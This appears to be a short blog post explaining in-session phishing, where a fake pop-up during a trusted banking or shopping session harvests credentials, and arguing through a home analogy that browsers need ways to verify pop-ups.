The in-session phishing attack is a game-changer.** This attack exploits the trust of a trusted site (e.g. shopping, banking) by jumping in mid-session in the form of a pop-up.* "Your session has timed out, please log on again" or "please reset your password" is what it might state.* Since it appears to be originating from the trusted site, the victim complies, sending login credentials not to the trusted server but to the bad guys.*
More information can be found here.
Consider the analogy that a trusted site is like your home.* You protect your credentials like you do the keys to your front door, and once you've crossed the threshold of either, you feel safe and your guard is down.* Anything that happens from that point forward is assumed safe.* So when you see a pop-up during one of these trusted sessions, you are not suspicious.* You do not consider that it could be like a stranger suddenly appearing in your living room.
We are still very focused on protecting the front door, but this is myopic because we don't consider that at some point your session could be compromised or hijacked.
We have to be, alas, more vigilant when using protected sites.* We cannot assume that crossing the front door equates to a perpetually safe session until you log out. Web browsers need to start verifying the source of pop-ups, and allow users to check the validity of pop-ups.* But pop-ups would be personally verified probably as often as SSL certificates are currently (i.e. rarely.)
Unfortunately (going back to our analogy) this added vigilence is akin to checking every room and looking around corners even when you're home!* And this could prove to be too much for the average user.* Let's hope a technical solution arrives soon.